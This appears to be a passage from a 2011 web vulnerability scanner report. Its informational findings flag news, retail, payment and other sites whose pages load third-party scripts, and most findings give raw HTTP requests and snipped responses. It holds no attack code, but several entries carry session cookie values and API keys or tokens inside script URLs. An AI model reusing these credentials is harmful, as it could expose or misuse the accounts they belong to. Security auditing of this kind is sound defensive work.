Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:03:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Content-Length: 95231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...

<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/idge.nww.subnet_opensource/;pos=lb2;sz=195x90;tile=2;ord=120353?" ></SCRIPT>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<td><script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.networkworld.com/community/index.php</script>
...[SNIP]...
<div class="description"><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/575/nodetag.js"></script>
...[SNIP]...

21.1221. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/experience_util.js
http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse
http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL
http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523
http://content.dl-rms.com/rms/mother/575/nodetag.js
http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=1&layt=8&fmt=simp
http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp
http://s.bit.ly/TweetAndTrack.js?v=1.01
http://wd.sharethis.com/button/buttons.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:03:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://wd.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
<div id="comments_form_recaptcha"><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcD8bwSAAAAAJY2_ih78yM8RE0DpYRwhHpqw6vL"></script>
...[SNIP]...
</div>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
<div id="col3_sponsoredlinks" class="module large">
       <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=1&layt=8&fmt=simp"> </script>
...[SNIP]...
</h3>
       <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/575/nodetag.js"></script>
...[SNIP]...


   <script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>
   <script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01 "></script>
...[SNIP]...

21.1222. http://www.newsvine.com/_wine/save previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_wine/save

Issue detail

The response dynamically includes the following scripts from other domains:

http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_wine/save HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:02:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=78a8cf29905fb686db7d439484f26124; expires=Mon, 20-Jan-2031 05:02:55 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
...[SNIP]...

21.1223. http://www.npr.org/2011/01/24/133171246/Business-News/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.npr.org
Path:	/2011/01/24/133171246/Business-News/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /2011/01/24/133171246/Business-News/x22 HTTP/1.1
Host: www.npr.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:30 GMT
Server: Apache
Vary: Accept,User-Agent, Accept-Encoding
Last-Modified: Mon, 24 Jan 2011 15:56:53 GMT
Accept-Ranges: bytes
Content-Length: 58952
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:01:30 GMT
Keep-Alive: timeout=10, max=4999
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Amazon To Offer Gr
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<div id="googledonatead">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div id="globalcontentbottom">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.1224. http://www.npr.org/2011/01/24/133171246/Business-News/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CIQBELYKMAw/x22/x3eShared previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.npr.org
Path:	/2011/01/24/133171246/Business-News/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CIQBELYKMAw/x22/x3eShared

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /2011/01/24/133171246/Business-News/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CIQBELYKMAw/x22/x3eShared HTTP/1.1
Host: www.npr.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Cache: jpcache vv2 - npr-html
Cache-Control: max-age=0
Expires: Mon, 24 Jan 2011 16:01:31 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Amazon To Offer Gr
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<li><script type="text/javascript" showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">npr708:http://www.npr.org/2011/01/24/133171246/Business-News</script>
...[SNIP]...
<div id="googledonatead">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div id="globalcontentbottom">
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.1225. http://www.officedepot.com/promo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officedepot.com
Path:	/promo.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.atgsvcs.com/js/atgsvcs.js
http://static.www.odcdn.com/1421577119/bundles/cm.js
http://static.www.odcdn.com/1485153267/includes/customerservice.js
http://static.www.odcdn.com/N136538418/bundles/lib.js

Request

GET /promo.do?file=/promo/pages/0928_recycling.jsp HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1226. http://www.opensource.org/licenses/bsd-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/bsd-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1227. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1228. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1229. http://www.ossp.org/pkg/tool/lmtp2nntp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ossp.org
Path:	/pkg/tool/lmtp2nntp/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1230. http://www.paperg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1231. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /flyerboard/soundings-publications-llc/2123/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:04:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4376
Connection: close
Via: 1.1 AN-0016020122637050

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>

   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1232. https://www.paperg.com/post.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://ssl.google-analytics.com/urchin.js

Request

Response

21.1233. http://www.parenthood.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parenthood.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/11805/slf.js
http://edge.quantserve.com/quant.js
http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S024 4
http://www.assoc-amazon.com/s/ads.js

Request

GET / HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=2bb2r6pp17500tshvuo5ak5ap5; path=/
Vary: Accept-Encoding
Cache-Control: public
Expires: Thu, 15 May 2010 20:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerwww_parenthood.com_http_pool=457334026.20480.0000; path=/
Content-Length: 106355

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta htt
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/ads.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S024 4"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/11805/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1234. http://www.passagemaker.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.passagemaker.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.passagemaker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
X-PassageMaker-Magazine: Be The Experience
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=VdID47XyywEkAAAAZTk0ZDgxOGUtNjY3My00Y2Y2LWI2ZWUtOGFhNDU4MjU4NzE10; expires=Mon, 04-Apr-2011 10:48:52 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=b419cc6e-ab08-4675-861d-502e04e1f67a; expires=Tue, 25-Jan-2011 00:28:52 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=cf5pyhzi5qrgsz55vgndi245; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 64784

<!--[if IE]><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head id="Head">
<!--************************************************
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1235. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=HjCqYFc5CXevJqotkFvMFXXfoIhvN4EW-tKQaiEr8amgJtib0LN-pmWtmu8m4ykzPAW2XZqlpMiPKRHK4wvHNGkR63CpLZRW66OIADyLhqUeCW3OJL35JwPuquu9XtupCaGbkm%7c7MTs5u44SsQwlwsvfYBCh-eN7c-WopQW6ARNbpWah9zCNwXi7WheWGQ_fSWzNJZRd5Af5W%7cqZnpbU6jjFBhsFea-10nNBdj15bLnQiVDM35QkeV0xMIv34GNGCo06XR8iUJDMZcLQxoK0%7c1295914136; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=DG0txL-D_ExP4tRfsCqsa40Ft5wDbFyjquJlxwVRFta791T3X2o2_RMTFJrbEaIkf1tYt_faGHrn0XU5; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d7%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Fri, 22-Jan-2021 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 20-Jan-2031 00:08:57 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25878

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20101108-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

21.1236. http://www.playshakespeare.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playshakespeare.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1237. http://www.pwc-traderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc-traderonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:08:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 43482

<!DOCTYPE html>
<html>
<head>
   <title>PWCs for Sale - Jet Ski, Sea Doo, Wave Runner and other Personal Watercraft - PWC-Traderonline.com</title>
   <meta http-equiv="Cache-Contr
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

